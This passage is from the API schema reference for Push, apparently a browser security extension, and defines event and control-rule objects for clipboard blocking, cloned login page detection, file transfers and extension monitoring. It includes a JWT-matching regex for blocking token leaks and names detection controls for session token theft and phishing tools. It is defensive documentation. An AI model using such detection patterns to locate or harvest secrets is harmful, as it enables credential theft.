employee","example":"2a2197de-ad2c-47e4-8dcb-fb0f04cf83e0"},"email":{"type":"string","description":"Email address of the employee. Null if the employee has been deleted.","format":"email","example":"john.hill@example.com","nullable":true},"version":{"type":"string","description":"Version of the browser","example":"125.0.0.0"},"tokenType":{"type":"string","description":"Type of enrollment token used","enum":["INDIVIDUAL","TEAM","LANDING_PAGE"]},"isActive":{"type":"boolean","description":"Whether the browser extension is used by a licensed employee","example":true},"browser":{"$ref":"#/components/schemas/BrowserType"},"os":{"$ref":"#/components/schemas/OSType"},"extensionVersion":{"type":"string","description":"Version of the Push extension","example":"1.66.17"},"language":{"type":"string","description":"The browser language","example":"en-US"},"profileEmail":{"type":"string","description":"The email address of the signed in browser profile","format":"email","example":"john.hill@example.com"},"profileSyncEnabled":{"type":"boolean","description":"Whether synchronisation is enabled on the browser profile","example":true},"creationTimestamp":{"type":"integer","description":"When this browser object was created, formatted as a UNIX timestamp (in seconds)","example":1698669223},"lastOnlineTimestamp":{"type":"integer","description":"When this browser was last seen, formatted as a UNIX timestamp (in seconds)","example":1716290202}}}},"components/schemas/BrowserExtensionEvent":{"id":"components/schemas/BrowserExtensionEvent","kind":"json-schema","title":"Browser Extension","data":{"title":"Browser Extension","type":"object","description":"This object represents an extension in an employee's browser in your organization.","properties":{"id":{"type":"string","description":"Static identifier for the extension.","example":"gmbgaklkmjakoegficnlkhebmhkjfich"},"employee":{"$ref":"#/components/schemas/EmployeeInEvent"},"browserId":{"type":"string","description":"Identifier of the employee's Push browser.","example":"72d0347a-2663-4ef5-b1c5-df39163f1603"},"browser":{"$ref":"#/components/schemas/BrowserType"},"name":{"type":"string","description":"Name of the browser extension","example":"Privacy Badger"},"description":{"type":"string","description":"Description of the browser extension","example":"Privacy Badger automatically learns to block invisible trackers."},"deploymentMode":{"type":"string","description":"Which method was used to install this extension","example":"MANUAL","enum":["MANAGED","DEVELOPMENT","MANUAL","SIDELOAD","OTHER"]},"permissions":{"type":"array","items":{"type":"string"},"description":"Permissions required by the browser extension","example":["activeTab","contextMenus","storage"]},"hostPermissions":{"type":"array","items":{"type":"string"},"description":"Host permissions allow extensions to interact with the URLs matching these patterns.","example":["https://*/*","http://*/*"]},"version":{"type":"string","description":"Version of the browser extension","example":"3.1.5.2"},"versionName":{"type":"string","description":"Version number shown to the user","example":"build rc2"},"enabled":{"type":"boolean","description":"Whether the browser extension is enabled or not","example":true},"disabledReason":{"type":"string","description":"Reason why the browser extension was disabled","example":"NEW_PERMISSION_REQUIRED","enum":["NEW_PERMISSION_REQUIRED","UNKNOWN"]},"updateUrl":{"type":"string","description":"The URL where the browser extension gets updates from","example":"http://clients2.google.com/service/update2/crx"},"homePageUrl":{"type":"string","description":"Link to the browser extensions home page","example":"http://www.eff.org/"}}}},"components/schemas/BrowserExtensionStateEnforcementEvent":{"id":"components/schemas/BrowserExtensionStateEnforcementEvent","kind":"json-schema","title":"Browser extension state enforcement","data":{"title":"Browser extension state enforcement","type":"object","description":"This object represents a browser extension state enforcement event, indicating an employee had a browser extension blocked or force enabled.","properties":{"employee":{"$ref":"#/components/schemas/EmployeeInEvent"},"extensionId":{"type":"string","description":"ID of the browser extension that was blocked/enabled","example":"dljjddkmmcminffjbcmeccgfbjlhmhlm"},"extensionName":{"type":"string","description":"Name of the browser extension that was blocked/enabled (only populated if the browser extension has been previously observed)","example":"Example Extension","nullable":true},"browserExtensionBlocked":{"type":"object","description":"Details about the browser extension block (only present for block events)","nullable":true,"properties":{"title":{"type":"string","description":"The title of the browser extension disabled banner","example":"Extension Blocked"},"subtext":{"type":"string","description":"The subtext of the browser extension disabled banner","example":"This extension has been blocked by your administrator"}}},"trigger":{"type":"string","description":"Enum describing the trigger for the block action (only present for block events)","nullable":true,"enum":["DISABLED_ON_INSTALL","DISABLED_ON_USER_ENABLE","BLOCKED_ON_STORE_VISIT"],"example":"DISABLED_ON_INSTALL"},"sourceIpAddress":{"type":"string","description":"The IP address of the user","example":"8.158.25.38"},"browser":{"$ref":"#/components/schemas/BrowserType"},"os":{"$ref":"#/components/schemas/OSType"},"userAgent":{"type":"string","description":"The user agent string reported by the browser","example":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299"}}}},"components/schemas/ClipboardBlockingContentMatch":{"id":"components/schemas/ClipboardBlockingContentMatch","kind":"json-schema","title":"Clipboard Blocking Content Match","data":{"title":"Clipboard Blocking Content Match","type":"object","description":"This object represents a match for clipboard content.","properties":{"enum":{"type":"string","description":"The type of content match, formatted as an ENUM value.","example":"JWT"},"regex":{"type":"string","description":"Regex pattern that matched the clipboard content.","example":"eyJ[a-zA-Z0-9_-]{10,}\\.eyJ[a-zA-Z0-9_-]{10,}\\.[a-zA-Z0-9_-]{10,}"},"hash":{"type":"string","description":"SHA-256 hash of the clipboard content.","example":"6767d8f5dd1f782b4d5bd0c537bb7f8478b8d4adfbcabfb955238a5e292e959c"}}}},"components/schemas/ClipboardBlockingEvent":{"id":"components/schemas/ClipboardBlockingEvent","kind":"json-schema","title":"Clipboard blocking","data":{"title":"Clipboard blocking","type":"object","description":"This object represents a clipboard event (COPY, CUT reported as COPY, or PASTE) that matched a configured clipboard blocking rule.","properties":{"employee":{"$ref":"#/components/schemas/EmployeeInEvent"},"browserId":{"type":"string","description":"The browser instance identifier.","example":"c478966c-f927-411c-b919-179832d3d50c"},"url":{"type":"string","description":"URL where the clipboard event occurred (frame URL when in an iframe).","example":"https://chat.openai.com/chat"},"tabUrl":{"type":"string","description":"URL of the top-level tab.","example":"https://chat.openai.com/"},"operation":{"type":"string","enum":["COPY","PASTE"],"description":"The clipboard operation. Cut is reported as COPY."},"action":{"type":"string","enum":["DISPLAYED","COPY_ORIGINAL","COPY_REDACTED"],"description":"The action taken by the user on the banner. Null on monitor events and on the initial block-enforcement event before the banner is shown.","nullable":true},"mode":{"type":"string","enum":["MONITOR","WARN","BLOCK"],"description":"Mode of the matching rule."},"clipboardBlocking":{"type":"object","description":"Details of the warn/block banner shown to the employee. All fields are null on monitor events.","properties":{"title":{"type":"string","description":"The title of the banner shown to the employee.","example":"Sensitive content detected","nullable":true},"subtext":{"type":"string","description":"The subtext of the banner shown to the employee, as rendered HTML.","example":"A clipboard copy on https://example.com was blocked because it contained content flagged by our security policy. The following was found: JWT Token.","nullable":true},"copyRedactedButtonText":{"type":"string","description":"The Copy redacted button text. Null in MONITOR mode and for rules with no content patterns.","example":"Copy redacted version","nullable":true},"copyOriginalButtonText":{"type":"string","description":"The Copy original button text. Only applicable in WARN mode.","example":"Copy original version","nullable":true},"acknowledgeButtonText":{"type":"string","description":"The Acknowledge button text. Only applicable in BLOCK mode for rules with no content patterns.","example":"Understood","nullable":true}}},"incognito":{"type":"boolean","description":"True if the browser was in private / incognito mode."},"sourceIpAddress":{"type":"string","nullable":true,"description":"Source IP address of the request that submitted the event.","example":"8.158.25.38"},"browser":{"$ref":"#/components/schemas/BrowserType"},"os":{"$ref":"#/components/schemas/OSType"},"userAgent":{"type":"string","nullable":true,"description":"The user agent string reported by the browser."},"contentMatch":{"$ref":"#/components/schemas/ClipboardBlockingContentMatch"},"content":{"type":"string","nullable":true,"description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Captured clipboard content, ≤ 200 KB. Null when content capture is disabled."},"children":[]}]}]}]}}}},"components/schemas/ClipboardCustomRegexPattern":{"id":"components/schemas/ClipboardCustomRegexPattern","kind":"json-schema","title":"Clipboard custom regex pattern","data":{"title":"Clipboard custom regex pattern","type":"object","description":"This object represents a clipboard custom regex pattern.","properties":{"enum":{"type":"string","description":"ENUM identifier for the regex pattern.","example":"JWT"},"name":{"type":"string","description":"Name of the regex pattern.","example":"JWT Pattern"},"regex":{"type":"string","description":"The regex pattern.","example":"eyJ[a-zA-Z0-9_-]{10,}\\.eyJ[a-zA-Z0-9_-]{10,}\\.[a-zA-Z0-9_-]{10,}"}}}},"components/schemas/ClonedLoginPageDetectedEvent":{"id":"components/schemas/ClonedLoginPageDetectedEvent","kind":"json-schema","title":"Cloned login page detected","data":{"title":"Cloned login page detected","type":"object","description":"This object represents a cloned login page detected event.","properties":{"employee":{"$ref":"#/components/schemas/EmployeeInEvent"},"mode":{"type":"string","nullable":true,"enum":["OFF","MONITOR","WARN","BLOCK"],"description":"Mode that the cloned login page detection control is in."},"clonedLoginPageType":{"type":"string","description":"The type of login page that was cloned","example":"OKTA"},"clonedLoginPageUrls":{"type":"array","items":{"type":"string"},"description":"The legitimate login page URL that was cloned.","example":["https://login.okta.com"]},"url":{"type":"string","description":"The URL that triggered this detection.","example":"https://evil.com/okta.php"},"referrerUrl":{"type":"string","description":"The URL the user was on before the cloned login page was detected","example":"https://statics.teams.cdn.office.net/","nullable":true},"sourceIpAddress":{"type":"string","description":"The IP address of the user.","example":"8.158.25.38"},"browser":{"$ref":"#/components/schemas/BrowserType"},"os":{"$ref":"#/components/schemas/OSType"},"userAgent":{"type":"string","description":"The user agent string reported by the browser","example":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299"},"action":{"type":"string","nullable":true,"enum":["DISPLAYED","IGNORED"],"description":"The action that the user took while on the cloned login detection page."},"indicator":{"type":"string","description":"The indicator that was used to detect the cloned login page.","example":"INDICATOR_01"}}}},"components/schemas/ControlRuleCondition":{"id":"components/schemas/ControlRuleCondition","kind":"json-schema","title":"ControlRuleCondition","data":{"type":"object","description":"A pattern matching condition.","properties":{"patterns":{"type":"array","items":{"type":"string"},"description":"The patterns to match."},"include":{"type":"boolean","description":"Whether the condition is to match the pattern or not, i.e. include or exclude matches.","example":true}},"required":["patterns","include"]}},"components/schemas/ControlRuleIncludeCondition":{"id":"components/schemas/ControlRuleIncludeCondition","kind":"json-schema","title":"ControlRuleIncludeCondition","data":{"type":"object","description":"A pattern matching condition that is always included.","properties":{"patterns":{"type":"array","items":{"type":"string"},"description":"The patterns to match.","example":["*://example.com/*"]}},"required":["patterns"]}},"components/schemas/ControlRuleCriteria":{"id":"components/schemas/ControlRuleCriteria","kind":"json-schema","title":"ControlRuleCriteria","data":{"type":"object","description":"The criteria for applying the rule.","properties":{"appLabels":{"allOf":[{"$ref":"#/components/schemas/ControlRuleCondition"}],"description":"Conditions for matching app labels."},"employeeGroups":{"allOf":[{"$ref":"#/components/schemas/ControlRuleCondition"}],"description":"Conditions for matching employee groups."},"approvalStates":{"allOf":[{"$ref":"#/components/schemas/ControlRuleCondition"}],"description":"Conditions for matching approval states."},"sensitivityLevels":{"allOf":[{"$ref":"#/components/schemas/ControlRuleCondition"}],"description":"Conditions for matching sensitivity levels."},"employeeEmails":{"allOf":[{"$ref":"#/components/schemas/ControlRuleCondition"}],"description":"Conditions for matching employee emails."},"employeeIds":{"allOf":[{"$ref":"#/components/schemas/ControlRuleCondition"}],"description":"Conditions for matching employee identifiers."},"appTypes":{"allOf":[{"$ref":"#/components/schemas/ControlRuleCondition"}],"description":"Conditions for matching app types."},"urlPatterns":{"allOf":[{"$ref":"#/components/schemas/ControlRuleIncludeCondition"}],"description":"Conditions for matching arbitrary url patterns."},"browserExtensionIds":{"allOf":[{"$ref":"#/components/schemas/ControlRuleCondition"}],"description":"Conditions for matching specific browser extensions by ID."},"browserExtensionPermissions":{"allOf":[{"$ref":"#/components/schemas/ControlRuleCondition"}],"description":"Conditions for matching browser extensions by the permissions they use."},"browserExtensionDeploymentType":{"allOf":[{"$ref":"#/components/schemas/ControlRuleCondition"}],"description":"Conditions for matching specific browser extensions by the method of installation."},"browserExtensionProfile":{"allOf":[{"$ref":"#/components/schemas/ControlRuleCondition"}],"description":"Conditions for matching specific browser extensions by the profile they are installed to."}}}},"components/schemas/ControlRule":{"id":"components/schemas/ControlRule","kind":"json-schema","title":"Control Rule","data":{"title":"Control Rule","type":"object","description":"This object represents a control rule.","nullable":false,"properties":{"ruleId":{"type":"string","description":"The unique identifier for the rule","example":"c478966c-f927-411c-b919-179832d3d50c"},"control":{"type":"string","description":"The control that the rule applies to.","enum":["APP_BANNER","BLOCKED_URL","BROWSER_EXTENSION_BLOCKING","CLONED_LOGIN_PAGE_DETECTION","MALICIOUS_COPY_PASTE_DETECTION","MFA_ENFORCEMENT","PASSWORD_LOGGING_PREVENTION","PASSWORD_PROTECTION","PHISHING_TOOL_DETECTION","SESSION_TOKEN_THEFT_DETECTION","SSO_PASSWORD_PROTECTION"],"x-enumDescriptions":{"APP_BANNER":"The App Banner control.","BLOCKED_URL":"The Blocked URL control.","BROWSER_EXTENSION_BLOCKING":"The Browser Extension Blocking control.","CLONED_LOGIN_PAGE_DETECTION":"The Cloned Login Page Detection control.","MALICIOUS_COPY_PASTE_DETECTION":"The Malicious Copy-Paste Detection control.","MFA_ENFORCEMENT":"The MFA Enforcement control.","PASSWORD_LOGGING_PREVENTION":"The password logging prevention control.","PASSWORD_PROTECTION":"The Password Protection control.","PHISHING_TOOL_DETECTION":"The Phishing Tool Detection control.","SESSION_TOKEN_THEFT_DETECTION":"The Session Theft Detection control.","SSO_PASSWORD_PROTECTION":"The SSO Password Protection control."}},"description":{"type":"string","description":"The description given to the rule.","example":"Display app banner on ChatGPT"},"enabled":{"type":"boolean","description":"Whether the rule is enabled.","example":true},"criteria":{"$ref":"#/components/schemas/ControlRuleCriteria"},"settings":{"type":"object","description":"The settings for the control."},"lastUpdatedTimestamp":{"type":"integer","description":"When the rule was last updated, formatted as a UNIX timestamp (in seconds).","example":1698604061}},"required":["ruleId","control","description","enabled","criteria","lastUpdatedTimestamp"]}},"components/schemas/CustomDetectionConfiguration":{"id":"components/schemas/CustomDetectionConfiguration","kind":"json-schema","title":"Custom detection configuration","data":{"title":"Custom detection configuration","type":"object","description":"The configuration details of a custom detection.","properties":{"detectionEventName":{"type":"string","description":"The name of the custom detection event.","example":"Torrent website visit"},"detectionEventType":{"type":"string","description":"The type identifier of the custom detection event.","example":"CUSTOM_TORRENT_WEBSITE_VISIT"},"detectionEventConfiguration":{"type":"string","description":"The YAML configuration of the custom detection.","example":"input:\n  type: navigation\nconditions:\n  - url_pattern: '*.torrent.*'\n"}},"required":["detectionEventName","detectionEventType","detectionEventConfiguration"]}},"components/schemas/CustomDetectionDetectedEvent":{"id":"components/schemas/CustomDetectionDetectedEvent","kind":"json-schema","title":"Custom detection","data":{"title":"Custom detection","type":"object","description":"This object represents a custom detection event.","properties":{"employee":{"$ref":"#/components/schemas/EmployeeInEvent"},"detectionEventType":{"type":"string","description":"The auto-generated custom detection event type.","example":"CUSTOM_TORRENT_WEBSITE_VISIT"},"detectionEventName":{"type":"string","description":"The human-readable name of the custom detection event.","example":"Torrent website visit"},"indicator":{"type":"string","description":"The indicator that matched the detection rule.","example":"TORRENT_MAGNET_LINK"},"severity":{"type":"string","enum":["LOW","MEDIUM","HIGH","CRITICAL"],"description":"The severity configured by the customer for this detection."},"mode":{"type":"string","enum":["MONITOR","WARN","BLOCK"],"description":"The mode of the custom detection control."},"action":{"type":"string","nullable":true,"enum":["DISPLAYED","IGNORED"],"description":"The action the user took when the warning banner was displayed."},"url":{"type":"string","description":"The URL the user was on when the detection occurred.","example":"https://www.torrent-site.com"},"referrerUrl":{"type":"string","description":"The referrer URL of the page where the detection occurred.","example":"https://www.google.com/search?q=torrent","nullable":true},"sourceIpAddress":{"type":"string","description":"The IP address of the user.","example":"8.158.25.38"},"userAgent":{"type":"string","description":"The user agent string reported by the browser.","example":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299"},"os":{"$ref":"#/components/schemas/OSType"},"browser":{"$ref":"#/components/schemas/BrowserType"}}}},"components/schemas/DomainCategoryBlockingEvent":{"id":"components/schemas/DomainCategoryBlockingEvent","kind":"json-schema","title":"Domain Category Blocking","data":{"title":"Domain Category Blocking","type":"object","description":"Triggered when an employee navigates to a domain that matches a domain category blocking rule (in MONITOR, WARN, or BLOCK mode).","properties":{"employee":{"$ref":"#/components/schemas/EmployeeInEvent"},"domain":{"type":"string","description":"The domain that triggered the rule.","example":"casino.example.com"},"url":{"type":"string","description":"Full URL, path, or domain depending on the matching rule's URL granularity setting.","example":"https://casino.example.com/play","nullable":true},"categories":{"type":"array","description":"Categories matched on this navigation.","items":{"type":"object","properties":{"code":{"type":"integer","description":"Category code.","example":24},"name":{"type":"string","description":"Friendly category name.","example":"Gambling"}}}},"mode":{"type":"string","description":"Mode of the rule that matched.","enum":["MONITOR","WARN","BLOCK"]},"action":{"type":"string","description":"What action the employee took. Null for MONITOR mode events where no page is shown.","enum":["DISPLAYED","IGNORED"],"nullable":true},"domainCategoryBlocking":{"type":"object","description":"Details of the domain category blocking banner.","properties":{"title":{"type":"string","description":"Title shown on the warn/block page (only for WARN/BLOCK).","example":"Access restricted","nullable":true},"subtext":{"type":"string","description":"Subtext shown on the warn/block page (only for WARN/BLOCK).","example":"The domain casino.example.com is categorized as Gambling...","nullable":true},"buttonText":{"type":"string","description":"Button text shown on the warn page (only for WARN).","example":"Continue anyway","nullable":true}}},"sourceIpAddress":{"type":"string","description":"The IP address of the user.","example":"8.158.25.38"},"userAgent":{"type":"string","description":"The user agent string reported by the browser.","example":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299"},"os":{"$ref":"#/components/schemas/OSType"},"browser":{"$ref":"#/components/schemas/BrowserType"}}}},"components/schemas/EmployeeEvent":{"id":"components/schemas/EmployeeEvent","kind":"json-schema","title":"Employee","data":{"title":"Employee","type":"object","nullable":true,"description":"This object represents an employee in your organization.","properties":{"id":{"type":"string","description":"Unique identifier for the employee","example":"2a2197de-ad2c-47e4-8dcb-fb0f04cf83e0"},"email":{"type":"string","description":"Email address of the employee","format":"email","example":"john.hill@example.com"},"firstName":{"type":"string","description":"First name of the employee\n\nNote: changes to this field do not trigger an UPDATE event\n","example":"John"},"lastName":{"type":"string","description":"Last name of the employee\n\nNote: changes to this field do not trigger an UPDATE event\n","example":"Hill"},"department":{"type":"string","description":"Department - as provided by connected API integrations\n\nNote: changes to this field do not trigger an UPDATE event\n","example":"Security Engineering"},"location":{"type":"string","description":"Location - as provided by connected API integrations\n\nNote: changes to this field do not trigger an UPDATE event\n","example":"New York"},"licensed":{"type":"boolean","description":"Whether the employee is licensed on the Push platform","example":true},"chatopsEnabled":{"type":"boolean","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Whether the employee has ChatOps enabled"},"children":[]},{"$$mdtype":"Node","type":"tag","tag":"html","inline":true,"attributes":{"name":"blockquote","attrs":{}},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Deprecation notice: this value no longer does anything unless you still have access to the legacy Employee chat topics functionality on your account. It will be removed in the next API version."},"children":[]}]}]}]}],"example":true,"deprecated":true},"creationTimestamp":{"type":"integer","description":"When this employee was created, formatted as a UNIX timestamp (in seconds)","example":1698669223}}}},"components/schemas/AdminAuditLogActorEmployee":{"id":"components/schemas/AdminAuditLogActorEmployee","kind":"json-schema","title":"Admin Audit Log Employee","data":{"title":"Admin Audit Log Employee","type":"object","description":"This object contains details about the employee that triggered the audit log.","properties":{"source":{"type":"string","enum":["EMPLOYEE"],"description":"The source of the action that generated the event."},"id":{"type":"string","description":"The employee's identifier."},"email":{"type":"string","description":"The employee's email."},"sourceIpAddress":{"type":"string","description":"The IP address of the employee at the time of the event."},"userAgent":{"type":"string","nullable":true,"description":"The user agent of the employee at the time of the event, if available."}},"required":["source","id","email","sourceIpAddress","userAgent"]}},"components/schemas/DownloadUnsafeReason":{"id":"components/schemas/DownloadUnsafeReason","kind":"json-schema","title":"DownloadUnsafeReason","data":{"title":"DownloadUnsafeReason","enum":["file","url","content","uncommon","host","unwanted","dangerous","potentiallyUnwanted","allowlistedByPolicy","asyncScanning","asyncLocalPasswordScanning","passwordProtected","blockedTooLarge","sensitiveContentWarning","sensitiveContentBlock","deepScannedFailed","deepScannedSafe","deepScannedOpenedDangerous","promptForScanning","promptForLocalPasswordScanning","accountCompromise"],"description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Browser-assessed download danger reason, based on Chrome's DangerType values. See https://developer.chrome.com/docs/extensions/reference/api/downloads#type-DangerType."},"children":[]}]}]}]}},"components/schemas/DownloadInterruptReason":{"id":"components/schemas/DownloadInterruptReason","kind":"json-schema","title":"DownloadInterruptReason","data":{"title":"DownloadInterruptReason","enum":["FILE_FAILED","FILE_ACCESS_DENIED","FILE_NO_SPACE","FILE_NAME_TOO_LONG","FILE_TOO_LARGE","FILE_VIRUS_INFECTED","FILE_TRANSIENT_ERROR","FILE_BLOCKED","FILE_SECURITY_CHECK_FAILED","FILE_TOO_SHORT","FILE_HASH_MISMATCH","FILE_SAME_AS_SOURCE","NETWORK_FAILED","NETWORK_TIMEOUT","NETWORK_DISCONNECTED","NETWORK_SERVER_DOWN","NETWORK_INVALID_REQUEST","SERVER_FAILED","SERVER_NO_RANGE","SERVER_BAD_CONTENT","SERVER_UNAUTHORIZED","SERVER_CERT_PROBLEM","SERVER_FORBIDDEN","SERVER_UNREACHABLE","SERVER_CONTENT_LENGTH_MISMATCH","SERVER_CROSS_ORIGIN_REDIRECT","USER_CANCELED","USER_SHUTDOWN","CRASH"],"description":"Reason a download was interrupted."}},"components/schemas/FileDownload":{"id":"components/schemas/FileDownload","kind":"json-schema","title":"File download","data":{"title":"File download","type":"object","description":"This object represents a file download event, indicating an employee has downloaded a file.","properties":{"employee":{"type":"object","$ref":"#/components/schemas/EmployeeInEvent"},"browserId":{"type":"string","description":"Unique identifier of the browser instance.","example":"2a2197de-ad2c-47e4-8dcb-fb0f04cf83e0"},"sourceIpAddress":{"type":"string","description":"The IP address of the user.","example":"8.158.25.38"},"userAgent":{"type":"string","description":"The user agent string reported by the browser.","example":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299"},"os":{"$ref":"#/components/schemas/OSType"},"browser":{"$ref":"#/components/schemas/BrowserType"},"filename":{"type":"string","description":"Name of the downloaded file.","example":"file.exe"},"startUrl":{"type":"string","description":"Original download URL. Null if not provided.","example":"https://phishing-site.com/downloads/file.exe","nullable":true},"url":{"type":"string","description":"Final URL after redirects. Null if not provided.","example":"https://phishing-site.com/downloads/file.exe","nullable":true},"referrerUrl":{"type":"string","description":"Referrer URL of the download request. Null if not provided.","example":"https://phishing-site.com/downloads","nullable":true},"tabUrl":{"type":"string","description":"URL of the tab that initiated the download. Null if not provided.","example":"https://phishing-site.com/downloads","nullable":true},"safe":{"type":"boolean","description":"Whether the browser considers the download safe. Always true on Firefox (danger property unsupported).","example":true},"unsafeReason":{"allOf":[{"$ref":"#/components/schemas/DownloadUnsafeReason"}],"type":"string","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Browser-assessed download danger reason, based on Chrome's DangerType values. Null if the download is considered safe. See https://developer.chrome.com/docs/extensions/reference/api/downloads#type-DangerType."},"children":[]}]}]}],"nullable":true},"mimeType":{"type":"string","description":"MIME type of the downloaded file.","example":"application/octet-stream","nullable":true},"fileSizeBytes":{"type":"integer","description":"Total file size in bytes.","example":1024,"nullable":true},"state":{"type":"string","enum":["COMPLETE","INTERRUPTED"],"example":"COMPLETE","description":"Terminal state of the download."},"interruptReason":{"allOf":[{"$ref":"#/components/schemas/DownloadInterruptReason"}],"type":"string","description":"Reason the download was interrupted. Null when state is complete.","nullable":true},"byExtensionId":{"type":"string","description":"ID of the browser extension that initiated the download. Null if not extension-initiated.","example":"example-extension-id","nullable":true},"byExtensionName":{"type":"string","description":"Name of the browser extension that initiated the download. Null if not extension-initiated.","example":"Example Extension","nullable":true},"incognito":{"type":"boolean","description":"Whether the download occurred in an incognito/private window.","example":true},"startTimestamp":{"type":"integer","description":"Unix timestamp (seconds) when the download started.","example":1698604061},"endTimestamp":{"type":"integer","description":"Unix timestamp (seconds) when the download completed or was interrupted.","example":1698604061},"downloadSource":{"type":"string","enum":["NETWORK","BLOB_URL","DATA_URL"],"example":"NETWORK","description":"Source of the download."}}}},"components/schemas/FileDownloadBlocking":{"id":"components/schemas/FileDownloadBlocking","kind":"json-schema","title":"File download blocking","data":{"title":"File download blocking","type":"object","description":"This object represents a file download blocking event.","properties":{"employee":{"$ref":"#/components/schemas/EmployeeInEvent"},"url":{"type":"string","description":"The URL of the file being downloaded.","example":"https://example.com/downloads/file.exe","nullable":true},"tabUrl":{"type":"string","description":"URL of the tab that initiated the download.","example":"https://example.com/downloads","nullable":true},"filename":{"type":"string","description":"Name of the file being downloaded.","example":"file.exe"},"fileSizeBytes":{"type":"integer","description":"Total file size in bytes.","example":1024,"nullable":true},"action":{"type":"string","enum":["DISPLAYED","IGNORED"],"description":"The action taken by the user on the banner page.  Only applicable in WARN mode.","nullable":true},"mode":{"type":"string","enum":["MONITOR","WARN","BLOCK"],"description":"The mode of the file download control rule.","example":"WARN"},"downloadSource":{"type":"string","enum":["NETWORK","BLOB_URL","DATA_URL"],"description":"Source of the download.","example":"NETWORK"},"error":{"type":"string","description":"Populated when the configured action could not be enforced (for example, content script injection failed on a restricted origin).","nullable":true},"fileDownloadBlocking":{"type":"object","description":"Details of the file download blocking banner.","properties":{"title":{"type":"string","description":"The title of the banner shown to users.","example":"Download blocked","nullable":true},"subtext":{"type":"string","description":"The subtext of the banner shown to users.","example":"This file has been blocked by your organisation's policy.","nullable":true},"buttonText":{"type":"string","description":"The button text on the banner. Only applicable in WARN mode.","example":"Download anyway","nullable":true}}},"sourceIpAddress":{"type":"string","description":"The IP address of the user.","example":"8.158.25.38"},"browser":{"$ref":"#/components/schemas/BrowserType"},"os":{"$ref":"#/components/schemas/OSType"},"userAgent":{"type":"string","description":"The user agent string reported by the browser.","example":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299"}}}},"components/schemas/FileUpload":{"id":"components/schemas/FileUpload","kind":"json-schema","title":"File upload","data":{"title":"File upload","type":"object","description":"This object represents a file upload event, indicating an employee has uploaded a file.","properties":{"employee":{"type":"object","$ref":"#/components/schemas/EmployeeInEvent"},"browserId":{"type":"string","description":"Unique identifier of the browser instance.","example":"2a2197de-ad2c-47e4-8dcb-fb0f04cf83e0"},"sourceIpAddress":{"type":"string","description":"The IP address of the user.","example":"8.158.25.38"},"userAgent":{"type":"string","description":"The user agent string reported by the browser.","example":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299"},"os":{"$ref":"#/components/schemas/OSType"},"browser":{"$ref":"#/components/schemas/BrowserType"},"filename":{"type":"string","description":"Name of the uploaded file.","example":"file.exe"},"destinationUrl":{"type":"string","description":"URL the file was uploaded to. Null if it could not be determined.","example":"https://example.com/uploads","nullable":true},"url":{"type":"string","description":"URL of the tab that initiated the upload.","example":"https://example.com/upload-page"},"mimeType":{"type":"string","description":"MIME type of the uploaded file.","example":"application/octet-stream","nullable":true},"fileSizeBytes":{"type":"integer","description":"Total file size in bytes.","example":1024,"nullable":true},"incognito":{"type":"boolean","description":"Whether the upload occurred in an incognito/private window.","example":true}}}},"components/schemas/FileUploadBlocking":{"id":"components/schemas/FileUploadBlocking","kind":"json-schema","title":"File upload blocking","data":{"title":"File upload blocking","type":"object","description":"This object represents a file upload blocking event.","properties":{"employee":{"$ref":"#/components/schemas/EmployeeInEvent"},"browser":{"$ref":"#/components/schemas/BrowserType"},"os":{"$ref":"#/components/schemas/OSType"},"userAgent":{"type":"string","description":"The user agent string reported by the browser.","example":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299"},"sourceIpAddress":{"type":"string","description":"The IP address of the user.","example":"8.158.25.38"},"url":{"type":"string","description":"URL of the page the user was on when the upload was triggered.","example":"https://chatgpt.com"},"filename":{"type":"string","description":"Name of the file being uploaded.","example":"report.pdf"},"fileSizeBytes":{"type":"integer","description":"Total file size in bytes.","example":1024,"nullable":true},"mimeType":{"type":"string","description":"MIME type of the file.","example":"application/pdf","nullable":true},"incognito":{"type":"boolean","description":"Whether the upload was initiated in an incognito/private window.","example":false},"action":{"type":"string","enum":["DISPLAYED","IGNORED"],"description":"The action taken by the user on the banner. Only applicable in WARN mode.","nullable":true},"mode":{"type":"string","enum":["MONITOR","WARN","BLOCK"],"description":"The mode of the file upload blocking rule.","example":"BLOCK"},"error":{"type":"string","description":"Populated when the configured action could not be enforced (for example, content script injection failed on a restricted origin).","nullable":true},"fileUploadBlocking":{"type":"object","description":"Details of the file upload blocking banner.","properties":{"title":{"type":"string","description":"The title of the banner shown to the employee. Only present for WARN/BLOCK actions.","example":"Upload blocked","nullable":true},"subtext":{"type":"string","description":"The subtext of the banner shown to the employee. Only present for WARN/BLOCK actions.","example":"This file has 